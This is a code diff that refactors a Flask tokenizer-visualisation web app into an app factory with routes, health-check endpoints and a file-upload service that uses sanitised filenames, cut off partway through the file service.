- selected_model = request.args.get('model', request.form.get('model', 'qwen3'))
1750
- custom_model = request.args.get('custom_model', request.form.get('custom_model', ''))
1751
- model_type = request.args.get('model_type', request.form.get('model_type', 'predefined'))
1752
-
1753
- # Determine which model to use based on model_type
1754
- model_to_use = selected_model if model_type == 'predefined' else custom_model
1755
-
1756
- if request.method == 'POST':
1757
- # Check if file upload
1758
- if 'file' in request.files and request.files['file'].filename:
1759
- uploaded_file = request.files['file']
1760
- # Save file to tmp directory
1761
- file_path = os.path.join(app.config['UPLOAD_FOLDER'], uploaded_file.filename)
1762
- uploaded_file.save(file_path)
1763
-
1764
- # Read a small preview of the file
1765
- with open(file_path, 'r', errors='replace') as f:
1766
- text = f.read(8096)
1767
-
1768
- try:
1769
- # Process the file
1770
- token_data = process_text("", model_to_use, is_full_file=True, file_path=file_path)
1771
-
1772
- # Clean up the file after processing
1773
- if os.path.exists(file_path):
1774
- os.remove(file_path)
1775
-
1776
- # If request is AJAX, return JSON
1777
- if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
1778
- return jsonify(token_data)
1779
-
1780
- except Exception as e:
1781
- error_message = str(e)
1782
- # Clean up the file after processing
1783
- if os.path.exists(file_path):
1784
- os.remove(file_path)
1785
-
1786
- if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
1787
- return jsonify({"error": error_message}), 400
1788
- return render_template_string(
1789
- HTML_TEMPLATE,
1790
- text=text,
1791
- token_data=None,
1792
- models=TOKENIZER_MODELS,
1793
- selected_model=selected_model,
1794
- custom_model=custom_model,
1795
- model_type=model_type,
1796
- error=error_message
1797
- )
1798
-
1799
- # Regular text processing
1800
- else:
1801
- text = request.form.get('text', '')
1802
- if text:
1803
- try:
1804
- token_data = process_text(text, model_to_use)
1805
-
1806
- # If request is AJAX, return JSON
1807
- if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
1808
- return jsonify(token_data)
1809
-
1810
- except Exception as e:
1811
- error_message = str(e)
1812
- if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
1813
- return jsonify({"error": error_message}), 400
1814
- return render_template_string(
1815
- HTML_TEMPLATE,
1816
- text=text,
1817
- token_data=None,
1818
- models=TOKENIZER_MODELS,
1819
- selected_model=selected_model,
1820
- custom_model=custom_model,
1821
- model_type=model_type,
1822
- error=error_message
1823
- )
1824
-
1825
- return render_template_string(
1826
- HTML_TEMPLATE,
1827
- text=text,
1828
- token_data=token_data,
1829
- models=TOKENIZER_MODELS,
1830
- selected_model=selected_model,
1831
- custom_model=custom_model,
1832
- model_type=model_type,
1833
- error=error_message
1834
- )
1835
-
1836
- if __name__ == "__main__":
1837
- app.run(host='0.0.0.0', port=7860, debug=False)
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ Tokenizer Pro - HuggingFace Space Launcher
4
+
5
+ This file serves as the entry point for HuggingFace Spaces, which expects app.py.
6
+ It imports and runs the restructured Flask application from the app/ package.
7
+ """
8
+
9
+ import os
10
+ from app import create_app
11
+ from config import Config, DevelopmentConfig, ProductionConfig
12
+
13
+ def get_config_class():
14
+ """Determine which configuration class to use based on environment."""
15
+ env = os.getenv('FLASK_ENV', 'development').lower()
16
+
17
+ if env == 'production':
18
+ return ProductionConfig
19
+ elif env == 'development':
20
+ return DevelopmentConfig
21
+ else:
22
+ return Config
23
+
24
+ # Create the Flask application using the app factory
25
+ app = create_app(get_config_class())
26
+
27
+ if __name__ == "__main__":
28
+ # Get configuration from environment variables
29
+ host = os.getenv('HOST', '0.0.0.0')
30
+ port = int(os.getenv('PORT', 7860))
31
+ debug = os.getenv('DEBUG', 'False').lower() in ('true', '1', 'yes')
32
+
33
+ app.run(host=host, port=port, debug=debug)
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
app/__init__.py ADDED
@@ -0,0 +1,49 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ import logging
3
+ from logging.handlers import RotatingFileHandler
4
+ from flask import Flask
5
+ from config import Config
6
+
7
+ def create_app(config_class=Config):
8
+ """Create and configure Flask application."""
9
+ app = Flask(__name__)
10
+ app.config.from_object(config_class)
11
+
12
+ # Ensure upload folder exists
13
+ if not os.path.exists(app.config['UPLOAD_FOLDER']):
14
+ os.makedirs(app.config['UPLOAD_FOLDER'])
15
+
16
+ # Ensure HuggingFace cache directory exists
17
+ if not os.path.exists(app.config['HF_HOME']):
18
+ os.makedirs(app.config['HF_HOME'])
19
+
20
+ # Set HuggingFace environment variables
21
+ os.environ['HF_HOME'] = app.config['HF_HOME']
22
+ if 'HF_CACHE_DIR' in app.config:
23
+ os.environ['HF_CACHE_DIR'] = app.config['HF_CACHE_DIR']
24
+
25
+ # Register Blueprints
26
+ from app.routes import main_bp
27
+ app.register_blueprint(main_bp)
28
+
29
+ # Setup logging
30
+ if not app.debug and not app.testing:
31
+ if not os.path.exists('logs'):
32
+ os.mkdir('logs')
33
+
34
+ file_handler = RotatingFileHandler(
35
+ f'logs/{app.config.get("LOG_FILE", "tokenizer_pro.log")}',
36
+ maxBytes=app.config.get("LOG_MAX_BYTES", 10 * 1024 * 1024),
37
+ backupCount=app.config.get("LOG_BACKUP_COUNT", 3)
38
+ )
39
+ file_handler.setFormatter(logging.Formatter(
40
+ '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'
41
+ ))
42
+
43
+ log_level = getattr(logging, app.config.get("LOG_LEVEL", "INFO").upper())
44
+ file_handler.setLevel(log_level)
45
+ app.logger.addHandler(file_handler)
46
+ app.logger.setLevel(log_level)
47
+ app.logger.info('Tokenizer Pro startup')
48
+
49
+ return app
app/routes.py ADDED
@@ -0,0 +1,354 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ from flask import Blueprint, request, render_template, jsonify, current_app
3
+
4
+ # Import services
5
+ from .services.tokenizer_service import tokenizer_service
6
+ from .services.file_service import file_service
7
+ from .utils.validators import validators, ValidationError
8
+
9
+ # Create Blueprint
10
+ main_bp = Blueprint('main', __name__)
11
+
12
+
13
+ @main_bp.route('/tokenizer-info', methods=['GET'])
14
+ def tokenizer_info():
15
+ """Endpoint to get tokenizer information without processing text."""
16
+ model_id = request.args.get('model_id', '')
17
+ is_custom = request.args.get('is_custom', 'false').lower() == 'true'
18
+
19
+ if not model_id:
20
+ return jsonify({"error": "No model ID provided"}), 400
21
+
22
+ try:
23
+ # Validate custom model path if it's a custom model
24
+ if is_custom:
25
+ try:
26
+ validators.validate_model_path(model_id)
27
+ except ValidationError as e:
28
+ return jsonify({"error": str(e)}), 400
29
+
30
+ # For predefined models, use the model name from the dictionary
31
+ if not is_custom and tokenizer_service.is_predefined_model(model_id):
32
+ model_id_or_name = model_id
33
+ else:
34
+ # For custom models, use the model ID directly
35
+ model_id_or_name = model_id
36
+
37
+ # Load the tokenizer and get info
38
+ tokenizer, info, error = tokenizer_service.load_tokenizer(model_id_or_name)
39
+
40
+ if error:
41
+ return jsonify({"error": error}), 400
42
+
43
+ return jsonify(info)
44
+ except Exception as e:
45
+ return jsonify({"error": f"Failed to get tokenizer info: {str(e)}"}), 500
46
+
47
+ @main_bp.route('/', methods=['GET', 'POST'])
48
+ def index():
49
+ text = ""
50
+ token_data = None
51
+ error_message = ""
52
+ selected_model = request.args.get('model', request.form.get('model', 'qwen3'))
53
+ custom_model = request.args.get('custom_model', request.form.get('custom_model', ''))
54
+ model_type = request.args.get('model_type', request.form.get('model_type', 'predefined'))
55
+
56
+ # Determine which model to use based on model_type
57
+ model_to_use = selected_model if model_type == 'predefined' else custom_model
58
+
59
+ if request.method == 'POST':
60
+ # Check if file upload
61
+ if 'file' in request.files and request.files['file'].filename:
62
+ uploaded_file = request.files['file']
63
+
64
+ try:
65
+ # Validate file
66
+ validators.validate_filename(uploaded_file.filename)
67
+ validators.validate_file_extension(uploaded_file.filename, file_service.ALLOWED_EXTENSIONS)
68
+
69
+ # Validate custom model if needed
70
+ if model_type == 'custom' and custom_model:
71
+ validators.validate_model_path(custom_model)
72
+
73
+ # Save file securely
74
+ file_path = file_service.save_uploaded_file(uploaded_file, current_app.config['UPLOAD_FOLDER'])
75
+
76
+ # Read a small preview of the file
77
+ preview_char_limit = current_app.config.get('PREVIEW_CHAR_LIMIT', 8096)
78
+ with open(file_path, 'r', errors='replace') as f:
79
+ text = f.read(preview_char_limit)
80
+
81
+ try:
82
+ # Process the file using file service
83
+ token_data = file_service.process_file_for_tokenization(
84
+ file_path=file_path,
85
+ model_id_or_name=model_to_use,
86
+ preview_char_limit=preview_char_limit,
87
+ max_display_tokens=current_app.config.get('MAX_DISPLAY_TOKENS', 50000),
88
+ chunk_size=current_app.config.get('CHUNK_SIZE', 1024 * 1024)
89
+ )
90
+
91
+ # Clean up the file after processing
92
+ file_service.cleanup_file(file_path)
93
+
94
+ # If request is AJAX, return JSON
95
+ if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
96
+ return jsonify(token_data)
97
+
98
+ except Exception as e:
99
+ error_message = str(e)
100
+ file_service.cleanup_file(file_path)
101
+
102
+ if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
103
+ return jsonify({"error": error_message}), 400
104
+ return render_template(
105
+ 'index.html',
106
+ text=text,
107
+ token_data=None,
108
+ models=tokenizer_service.TOKENIZER_MODELS,
109
+ selected_model=selected_model,
110
+ custom_model=custom_model,
111
+ model_type=model_type,
112
+ error=error_message
113
+ )
114
+
115
+ except ValidationError as e:
116
+ error_message = str(e)
117
+ if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
118
+ return jsonify({"error": error_message}), 400
119
+ return render_template(
120
+ 'index.html',
121
+ text="",
122
+ token_data=None,
123
+ models=tokenizer_service.TOKENIZER_MODELS,
124
+ selected_model=selected_model,
125
+ custom_model=custom_model,
126
+ model_type=model_type,
127
+ error=error_message
128
+ )
129
+
130
+ # Regular text processing
131
+ else:
132
+ text = request.form.get('text', '')
133
+ if text:
134
+ try:
135
+ # Validate text input
136
+ validators.validate_text_input(text)
137
+
138
+ # Validate custom model if needed
139
+ if model_type == 'custom' and custom_model:
140
+ validators.validate_model_path(custom_model)
141
+
142
+ # Process text using file service
143
+ token_data = file_service.process_text_for_tokenization(
144
+ text=text,
145
+ model_id_or_name=model_to_use,
146
+ preview_char_limit=current_app.config.get('PREVIEW_CHAR_LIMIT', 8096),
147
+ max_display_tokens=current_app.config.get('MAX_DISPLAY_TOKENS', 50000)
148
+ )
149
+
150
+ # If request is AJAX, return JSON
151
+ if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
152
+ return jsonify(token_data)
153
+
154
+ except ValidationError as e:
155
+ error_message = str(e)
156
+ if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
157
+ return jsonify({"error": error_message}), 400
158
+ return render_template(
159
+ 'index.html',
160
+ text=text,
161
+ token_data=None,
162
+ models=tokenizer_service.TOKENIZER_MODELS,
163
+ selected_model=selected_model,
164
+ custom_model=custom_model,
165
+ model_type=model_type,
166
+ error=error_message
167
+ )
168
+ except Exception as e:
169
+ error_message = str(e)
170
+ if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
171
+ return jsonify({"error": error_message}), 400
172
+ return render_template(
173
+ 'index.html',
174
+ text=text,
175
+ token_data=None,
176
+ models=tokenizer_service.TOKENIZER_MODELS,
177
+ selected_model=selected_model,
178
+ custom_model=custom_model,
179
+ model_type=model_type,
180
+ error=error_message
181
+ )
182
+
183
+ return render_template(
184
+ 'index.html',
185
+ text=text,
186
+ token_data=token_data,
187
+ models=tokenizer_service.TOKENIZER_MODELS,
188
+ selected_model=selected_model,
189
+ custom_model=custom_model,
190
+ model_type=model_type,
191
+ error=error_message
192
+ )
193
+
194
+
195
+ @main_bp.route('/health', methods=['GET'])
196
+ def health_check():
197
+ """Basic health check endpoint."""
198
+ import time
199
+ import psutil
200
+ from flask import __version__ as flask_version
201
+
202
+ try:
203
+ # Basic application status
204
+ status = {
205
+ "status": "healthy",
206
+ "timestamp": int(time.time()),
207
+ "version": "1.0.0",
208
+ "flask_version": flask_version,
209
+ "uptime": int(time.time()), # Simple uptime since this request
210
+ }
211
+
212
+ return jsonify(status), 200
213
+ except Exception as e:
214
+ return jsonify({
215
+ "status": "unhealthy",
216
+ "error": str(e),
217
+ "timestamp": int(time.time())
218
+ }), 500
219
+
220
+
221
+ @main_bp.route('/health/detailed', methods=['GET'])
222
+ def detailed_health_check():
223
+ """Detailed health check with system and service status."""
224
+ import time
225
+ import psutil
226
+ import os
227
+ from flask import __version__ as flask_version
228
+
229
+ try:
230
+ # System information
231
+ cpu_percent = psutil.cpu_percent(interval=1)
232
+ memory = psutil.virtual_memory()
233
+ disk = psutil.disk_usage('/')
234
+
235
+ # Check tokenizer service
236
+ tokenizer_status = "healthy"
237
+ tokenizer_cache_size = len(tokenizer_service.tokenizers) + len(tokenizer_service.custom_tokenizers)
238
+
239
+ # Test basic tokenizer loading
240
+ try:
241
+ test_tokenizer, _, error = tokenizer_service.load_tokenizer('gpt2')
242
+ if error:
243
+ tokenizer_status = f"warning: {error}"
244
+ except Exception as e:
245
+ tokenizer_status = f"error: {str(e)}"
246
+
247
+ # Check upload directory
248
+ upload_folder = current_app.config.get('UPLOAD_FOLDER', '/tmp')
249
+ upload_dir_exists = os.path.exists(upload_folder)
250
+ upload_dir_writable = os.access(upload_folder, os.W_OK) if upload_dir_exists else False
251
+
252
+ status = {
253
+ "status": "healthy",
254
+ "timestamp": int(time.time()),
255
+ "version": "1.0.0",
256
+ "flask_version": flask_version,
257
+ "system": {
258
+ "cpu_percent": round(cpu_percent, 1),
259
+ "memory": {
260
+ "total": memory.total,
261
+ "available": memory.available,
262
+ "percent": memory.percent,
263
+ "used": memory.used
264
+ },
265
+ "disk": {
266
+ "total": disk.total,
267
+ "used": disk.used,
268
+ "free": disk.free,
269
+ "percent": round((disk.used / disk.total) * 100, 1)
270
+ }
271
+ },
272
+ "services": {
273
+ "tokenizer_service": {
274
+ "status": tokenizer_status,
275
+ "cached_tokenizers": tokenizer_cache_size,
276
+ "available_models": len(tokenizer_service.TOKENIZER_MODELS)
277
+ },
278
+ "file_service": {
279
+ "upload_directory": upload_folder,
280
+ "directory_exists": upload_dir_exists,
281
+ "directory_writable": upload_dir_writable,
282
+ "allowed_extensions": list(file_service.ALLOWED_EXTENSIONS)
283
+ }
284
+ },
285
+ "configuration": {
286
+ "max_content_length": current_app.config.get('MAX_CONTENT_LENGTH'),
287
+ "cache_expiration": current_app.config.get('CACHE_EXPIRATION', 3600),
288
+ "max_display_tokens": current_app.config.get('MAX_DISPLAY_TOKENS', 50000),
289
+ "preview_char_limit": current_app.config.get('PREVIEW_CHAR_LIMIT', 8096)
290
+ }
291
+ }
292
+
293
+ # Determine overall status
294
+ overall_status = "healthy"
295
+ if tokenizer_status.startswith("error"):
296
+ overall_status = "unhealthy"
297
+ elif tokenizer_status.startswith("warning") or not upload_dir_writable:
298
+ overall_status = "degraded"
299
+
300
+ status["status"] = overall_status
301
+
302
+ return jsonify(status), 200 if overall_status == "healthy" else 503
303
+
304
+ except Exception as e:
305
+ return jsonify({
306
+ "status": "unhealthy",
307
+ "error": str(e),
308
+ "timestamp": int(time.time())
309
+ }), 500
310
+
311
+
312
+ @main_bp.route('/health/ready', methods=['GET'])
313
+ def readiness_check():
314
+ """Readiness check - determines if the application is ready to serve requests."""
315
+ try:
316
+ # Check if core services are ready
317
+ checks = {
318
+ "tokenizer_service": False,
319
+ "file_service": False,
320
+ "configuration": False
321
+ }
322
+
323
+ # Test tokenizer service
324
+ try:
325
+ test_tokenizer, _, error = tokenizer_service.load_tokenizer('gpt2')
326
+ checks["tokenizer_service"] = error is None
327
+ except:
328
+ checks["tokenizer_service"] = False
329
+
330
+ # Test file service
331
+ try:
332
+ upload_folder = current_app.config.get('UPLOAD_FOLDER', '/tmp')
333
+ checks["file_service"] = os.path.exists(upload_folder) and os.access(upload_folder, os.W_OK)
334
+ except:
335
+ checks["file_service"] = False
336
+
337
+ # Check configuration
338
+ required_configs = ['MAX_CONTENT_LENGTH', 'UPLOAD_FOLDER']
339
+ checks["configuration"] = all(current_app.config.get(config) is not None for config in required_configs)
340
+
341
+ all_ready = all(checks.values())
342
+
343
+ return jsonify({
344
+ "ready": all_ready,
345
+ "checks": checks,
346
+ "timestamp": int(time.time())
347
+ }), 200 if all_ready else 503
348
+
349
+ except Exception as e:
350
+ return jsonify({
351
+ "ready": False,
352
+ "error": str(e),
353
+ "timestamp": int(time.time())
354
+ }), 500
app/services/__init__.py ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ """
2
+ Service layer for Tokenizer Pro
3
+ """
app/services/file_service.py ADDED
@@ -0,0 +1,187 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ File Service - Handles file processing and chunked text analysis
3
+ """
4
+ import os
5
+ import uuid
6
+ from typing import Dict, Any, List, Tuple
7
+ from werkzeug.utils import secure_filename
8
+ from flask import current_app
9
+
10
+ from .tokenizer_service import tokenizer_service
11
+ from .stats_service import stats_service
12
+
13
+
14
+ class FileService:
15
+ """Service for handling file uploads and processing."""
16
+
17
+ # Allowed file extensions for security
18
+ ALLOWED_EXTENSIONS = {'.txt', '.md', '.py', '.js', '.html', '.css', '.json', '.csv', '.log'}
19
+
20
+ @staticmethod
21
+ def is_allowed_file(filename: str) -> bool:
22
+ """Check if the uploaded file has an allowed extension."""
23
+ if not filename:
24
+ return False
25
+ _, ext = os.path.splitext(filename.lower())
26
+ return ext in FileService.ALLOWED_EXTENSIONS
27
+
28
+ @staticmethod
29
+ def generate_secure_filename(original_filename: str) -> str:
30
+ """Generate a secure filename with UUID prefix."""
31
+ if not original_filename:
32
+ return f"{uuid.uuid4().hex}.txt"
33
+
34
+ # Secure the filename and add UUID prefix to avoid conflicts
35
+ secure_name = secure_filename(original_filename)
36
+ name, ext = os.path.splitext(secure_name)
37
+ return f"{uuid.uuid4().hex}_{name}{ext}"
38
+
39
+ @staticmethod
40
+ def save_uploaded_file(uploaded_file, upload_folder: str) -> str:
41
+ """
42
+ Save uploaded file to the upload folder with a secure filename.
43
+
44
+ Returns:
45
+ str: Path to the saved file
46
+ """
47
+ # Ensure upload folder exists
48
+ os.makedirs(upload_folder, exist_ok=True)
49
+
50
+ # Generate secure filename
51
+ secure_filename_str = FileService.generate_secure_filename(uploaded_file.filename)
52
+ file_path = os.path.join(upload_folder, secure_filename_str)
53
+
54
+ # Save the file
55
+ uploaded_file.save(file_path)
56
+ return file_path
57
+
58
+ @staticmethod
59
+ def process_file_for_tokenization(
60
+ file_path: str,
61
+ model_id_or_name: str,
62
+ preview_char_limit: int = 8096,
63
+ max_display_tokens: int = 50000,
64
+ chunk_size: int = 1024 * 1024
65
+ ) -> Dict[str, Any]:
66
+ """
67
+ Process a file for tokenization with chunked processing for large files.
68
+
69
+ Args:
70
+ file_path: Path to the file to process
71
+ model_id_or_name: Tokenizer model to use
72
+ preview_char_limit: Character limit for preview display
73
+ max_display_tokens: Maximum tokens to display
74
+ chunk_size: Size of chunks for processing large files
75
+
76
+ Returns:
77
+ Dict containing tokenization results
78
+ """
79
+ # Load tokenizer
80
+ tokenizer, tokenizer_info, error = tokenizer_service.load_tokenizer(model_id_or_name)
81
+
82
+ if error:
83
+ raise Exception(error)
84
+
85
+ # Read the preview for display
86
+ with open(file_path, 'r', errors='replace') as f:
87
+ preview_text = f.read(preview_char_limit)
88
+
89
+ # Tokenize preview for display
90
+ preview_tokens = tokenizer.tokenize(preview_text)
91
+ display_tokens = preview_tokens[:max_display_tokens]
92
+
93
+ # Process full file for stats in chunks to avoid memory issues
94
+ total_tokens = []
95
+ token_set = set()
96
+ total_length = 0
97
+
98
+ with open(file_path, 'r', errors='replace') as f:
99
+ while True:
100
+ chunk = f.read(chunk_size)
101
+ if not chunk:
102
+ break
103
+ total_length += len(chunk)
104
+ chunk_tokens = tokenizer.tokenize(chunk)
105
+ total_tokens.extend(chunk_tokens)
106
+ token_set.update(chunk_tokens)
107
+
108
+ # Calculate stats using approximation for original text
109
+ stats = stats_service.get_token_stats(total_tokens, ' ' * total_length)
110
+
111
+ # Format tokens for display
112
+ token_data = stats_service.format_tokens_for_display(display_tokens, tokenizer)
113
+
114
+ return {
115
+ 'tokens': token_data,
116
+ 'stats': stats,
117
+ 'display_limit_reached': len(total_tokens) > max_display_tokens,
118
+ 'total_tokens': len(total_tokens),
119
+ 'is_full_file': True,
120
+ 'preview_only': True,
121
